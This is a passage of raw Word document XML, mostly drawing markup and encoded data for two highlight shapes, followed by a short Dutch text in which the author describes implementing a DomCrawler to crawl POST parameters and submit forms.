                                <a:pt x="23212" y="119936"/>
                                <a:pt x="-1203" y="64957"/>
                                <a:pt x="46" y="52465"/>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81B58B" id="Freeform 461" o:spid="_x0000_s1026" style="position:absolute;margin-left:77.85pt;margin-top:174.25pt;width:140.45pt;height:24.8pt;z-index:251767808;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:middle" coordsize="1783875,31479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&#10;AAQABADzAAAADAsAAAAA&#10;" path="m46,52465c1295,39973,19727,60166,30026,59960,145036,57660,259803,47845,374800,44970l674603,37475c704583,34977,734506,31649,764544,29980,869432,24153,974622,23367,1079337,14990l1266715,0c1284135,348,1618548,-55,1738905,14990,1746744,15970,1753895,19987,1761390,22485,1790623,110184,1775504,51678,1783875,202367,1781377,222354,1784561,243921,1776380,262328,1773171,269548,1761795,269823,1753895,269823,1683896,269823,1613987,264826,1544033,262328l1409121,269823c1346614,274184,1284288,281023,1221744,284813,1139298,289810,1056718,292944,974406,299803,944426,302301,914525,306096,884465,307298,789570,311094,694590,312295,599652,314793l277364,307298c121839,301643,252756,300340,97482,284813l22531,277318c1993,215701,16460,268469,22531,134911,23212,119936,-1203,64957,46,52465xe" fillcolor="#ffc000 [3207]" strokecolor="#7f5f00 [1607]" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="46,52465;30026,59960;374800,44970;674603,37475;764544,29980;1079337,14990;1266715,0;1738905,14990;1761390,22485;1783875,202367;1776380,262328;1753895,269823;1544033,262328;1409121,269823;1221744,284813;974406,299803;884465,307298;599652,314793;277364,307298;97482,284813;22531,277318;22531,134911;46,52465" o:connectangles="0,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4736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A98E2A8" wp14:editId="3E0B5B4F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>948690</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1491615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2974975" cy="367030"/>
                <wp:effectExtent l="25400" t="0" r="22225" b="13970"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="-184" y="1495"/>
                    <wp:lineTo x="-184" y="20927"/>
                    <wp:lineTo x="21577" y="20927"/>
                    <wp:lineTo x="21577" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="29" name="Freeform 29"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2974975" cy="367030"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 0 w 2975317"/>
                            <a:gd name="connsiteY0" fmla="*/ 55426 h 367518"/>
                            <a:gd name="connsiteX1" fmla="*/ 7034 w 2975317"/>
                            <a:gd name="connsiteY1" fmla="*/ 315678 h 367518"/>
                            <a:gd name="connsiteX2" fmla="*/ 14068 w 2975317"/>
                            <a:gd name="connsiteY2" fmla="*/ 336780 h 367518"/>
                            <a:gd name="connsiteX3" fmla="*/ 844062 w 2975317"/>
                            <a:gd name="connsiteY3" fmla="*/ 343813 h 367518"/>
                            <a:gd name="connsiteX4" fmla="*/ 1083213 w 2975317"/>
                            <a:gd name="connsiteY4" fmla="*/ 350847 h 367518"/>
                            <a:gd name="connsiteX5" fmla="*/ 2096086 w 2975317"/>
                            <a:gd name="connsiteY5" fmla="*/ 364915 h 367518"/>
                            <a:gd name="connsiteX6" fmla="*/ 2159391 w 2975317"/>
                            <a:gd name="connsiteY6" fmla="*/ 357881 h 367518"/>
                            <a:gd name="connsiteX7" fmla="*/ 2398542 w 2975317"/>
                            <a:gd name="connsiteY7" fmla="*/ 357881 h 367518"/>
                            <a:gd name="connsiteX8" fmla="*/ 2630659 w 2975317"/>
                            <a:gd name="connsiteY8" fmla="*/ 364915 h 367518"/>
                            <a:gd name="connsiteX9" fmla="*/ 2890911 w 2975317"/>
                            <a:gd name="connsiteY9" fmla="*/ 350847 h 367518"/>
                            <a:gd name="connsiteX10" fmla="*/ 2940148 w 2975317"/>
                            <a:gd name="connsiteY10" fmla="*/ 336780 h 367518"/>
                            <a:gd name="connsiteX11" fmla="*/ 2961249 w 2975317"/>
                            <a:gd name="connsiteY11" fmla="*/ 322712 h 367518"/>
                            <a:gd name="connsiteX12" fmla="*/ 2975317 w 2975317"/>
                            <a:gd name="connsiteY12" fmla="*/ 280509 h 367518"/>
                            <a:gd name="connsiteX13" fmla="*/ 2968283 w 2975317"/>
                            <a:gd name="connsiteY13" fmla="*/ 231272 h 367518"/>
                            <a:gd name="connsiteX14" fmla="*/ 2954216 w 2975317"/>
                            <a:gd name="connsiteY14" fmla="*/ 76527 h 367518"/>
                            <a:gd name="connsiteX15" fmla="*/ 2947182 w 2975317"/>
                            <a:gd name="connsiteY15" fmla="*/ 41358 h 367518"/>
                            <a:gd name="connsiteX16" fmla="*/ 2940148 w 2975317"/>
                            <a:gd name="connsiteY16" fmla="*/ 20257 h 367518"/>
                            <a:gd name="connsiteX17" fmla="*/ 2912013 w 2975317"/>
                            <a:gd name="connsiteY17" fmla="*/ 6189 h 367518"/>
                            <a:gd name="connsiteX18" fmla="*/ 2771336 w 2975317"/>
                            <a:gd name="connsiteY18" fmla="*/ 13223 h 367518"/>
                            <a:gd name="connsiteX19" fmla="*/ 2574388 w 2975317"/>
                            <a:gd name="connsiteY19" fmla="*/ 27290 h 367518"/>
                            <a:gd name="connsiteX20" fmla="*/ 2384474 w 2975317"/>
                            <a:gd name="connsiteY20" fmla="*/ 34324 h 367518"/>
                            <a:gd name="connsiteX21" fmla="*/ 1463040 w 2975317"/>
                            <a:gd name="connsiteY21" fmla="*/ 20257 h 367518"/>
                            <a:gd name="connsiteX22" fmla="*/ 1111348 w 2975317"/>
                            <a:gd name="connsiteY22" fmla="*/ 6189 h 367518"/>
                            <a:gd name="connsiteX23" fmla="*/ 590843 w 2975317"/>
                            <a:gd name="connsiteY23" fmla="*/ 6189 h 367518"/>
                            <a:gd name="connsiteX24" fmla="*/ 246185 w 2975317"/>
                            <a:gd name="connsiteY24" fmla="*/ 13223 h 367518"/>
                            <a:gd name="connsiteX25" fmla="*/ 49237 w 2975317"/>
                            <a:gd name="connsiteY25" fmla="*/ 27290 h 367518"/>
                            <a:gd name="connsiteX26" fmla="*/ 0 w 2975317"/>
                            <a:gd name="connsiteY26" fmla="*/ 55426 h 367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975317" h="367518">
                              <a:moveTo>
                                <a:pt x="0" y="55426"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="2345" y="142177"/>
                                <a:pt x="2700" y="229004"/>
                                <a:pt x="7034" y="315678"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="7404" y="323083"/>
                                <a:pt x="6658" y="336531"/>
                                <a:pt x="14068" y="336780"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="290586" y="346075"/>
                                <a:pt x="567397" y="341469"/>
                                <a:pt x="844062" y="343813"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="1083213" y="350847"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2096086" y="364915"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="2117188" y="362570"/>
                                <a:pt x="2138159" y="357881"/>
                                <a:pt x="2159391" y="357881"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2412550" y="357881"/>
                                <a:pt x="2290118" y="379566"/>
                                <a:pt x="2398542" y="357881"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2475914" y="360226"/>
                                <a:pt x="2553251" y="364915"/>
                                <a:pt x="2630659" y="364915"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2728666" y="364915"/>
                                <a:pt x="2803314" y="368367"/>
                                <a:pt x="2890911" y="350847"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2912985" y="346432"/>
                                <a:pt x="2920041" y="343482"/>
                                <a:pt x="2940148" y="336780"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2947182" y="332091"/>
                                <a:pt x="2956769" y="329881"/>
                                <a:pt x="2961249" y="322712"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2969108" y="310137"/>
                                <a:pt x="2975317" y="280509"/>
                                <a:pt x="2975317" y="280509"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2972972" y="264097"/>
                                <a:pt x="2969719" y="247789"/>
                                <a:pt x="2968283" y="231272"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2957321" y="105209"/>
                                <a:pt x="2968580" y="155535"/>
                                <a:pt x="2954216" y="76527"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2952077" y="64765"/>
                                <a:pt x="2950082" y="52956"/>
                                <a:pt x="2947182" y="41358"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2945384" y="34165"/>
                                <a:pt x="2945391" y="25500"/>
                                <a:pt x="2940148" y="20257"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2932734" y="12843"/>
                                <a:pt x="2921391" y="10878"/>
                                <a:pt x="2912013" y="6189"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="2771336" y="13223"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="2705648" y="17328"/>
                                <a:pt x="2640159" y="24854"/>
                                <a:pt x="2574388" y="27290"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="2384474" y="34324"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="1761560" y="17020"/>
                                <a:pt x="2603562" y="38953"/>
                                <a:pt x="1463040" y="20257"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1405049" y="19306"/>
                                <a:pt x="1178046" y="9089"/>
                                <a:pt x="1111348" y="6189"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="642136" y="22369"/>
                                <a:pt x="1223199" y="6189"/>
                                <a:pt x="590843" y="6189"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="475933" y="6189"/>
                                <a:pt x="361071" y="10878"/>
                                <a:pt x="246185" y="13223"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="180536" y="17912"/>
                                <a:pt x="85745" y="-27473"/>
                                <a:pt x="49237" y="27290"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="0" y="55426"/>
                              </a:ln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55565E" id="Freeform 61" o:spid="_x0000_s1026" style="position:absolute;margin-left:74.7pt;margin-top:117.45pt;width:234.25pt;height:28.9pt;z-index:251764736;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:middle" coordsize="2975317,36751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&#10;" path="m0,55426c2345,142177,2700,229004,7034,315678,7404,323083,6658,336531,14068,336780,290586,346075,567397,341469,844062,343813l1083213,350847,2096086,364915c2117188,362570,2138159,357881,2159391,357881,2412550,357881,2290118,379566,2398542,357881,2475914,360226,2553251,364915,2630659,364915,2728666,364915,2803314,368367,2890911,350847,2912985,346432,2920041,343482,2940148,336780,2947182,332091,2956769,329881,2961249,322712,2969108,310137,2975317,280509,2975317,280509,2972972,264097,2969719,247789,2968283,231272,2957321,105209,2968580,155535,2954216,76527,2952077,64765,2950082,52956,2947182,41358,2945384,34165,2945391,25500,2940148,20257,2932734,12843,2921391,10878,2912013,6189l2771336,13223c2705648,17328,2640159,24854,2574388,27290l2384474,34324c1761560,17020,2603562,38953,1463040,20257,1405049,19306,1178046,9089,1111348,6189,642136,22369,1223199,6189,590843,6189,475933,6189,361071,10878,246185,13223,180536,17912,85745,-27473,49237,27290l0,55426xe" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,55352;7033,315259;14066,336333;843965,343356;1083088,350381;2095845,364430;2159143,357406;2398266,357406;2630357,364430;2890579,350381;2939810,336333;2960909,322283;2974975,280137;2967942,230965;2953876,76425;2946843,41303;2939810,20230;2911678,6181;2771017,13205;2574092,27254;2384200,34278;1462872,20230;1111220,6181;590775,6181;246157,13205;49231,27254;0,55352" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C656B9">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BCA924" w14:textId="4221DA6D" w:rsidR="00E97057" w:rsidRPr="002F39EC" w:rsidRDefault="002F39EC" w:rsidP="00A622C1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F39EC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DomCrawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17602005" w14:textId="4676B20A" w:rsidR="003F667D" w:rsidRDefault="00E047C9" w:rsidP="003F667D">
      <w:r>
        <w:t xml:space="preserve">Zoals eerder vermeld heb ik de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DomCrawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> specifiek voor twee taken</w:t>
      </w:r>
      <w:r w:rsidR="00714D10">
        <w:t xml:space="preserve"> geïmplementeerd: het crawlen van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00714D10">
        <w:t>POST</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00714D10">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009047DB">
        <w:t>parameters</w:t>
      </w:r>
      <w:r w:rsidR="00714D10">
        <w:t xml:space="preserve"> en het verzenden van formulieren.</w:t>
      </w:r>
      <w:r w:rsidR="005A7CFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF0681">
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF0681">
        <w:t>DomCrawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF0681">
        <w:t xml:space="preserve"> heeft een geavanceerde filter interface </w:t>
      </w:r>
      <w:r w:rsidR="00D323CD">
        <w:t xml:space="preserve">waarmee zeer </w:t>
      </w:r>
      <w:r w:rsidR="00AF6CBD">
        <w:t xml:space="preserve">nauwkeurig op </w:t>
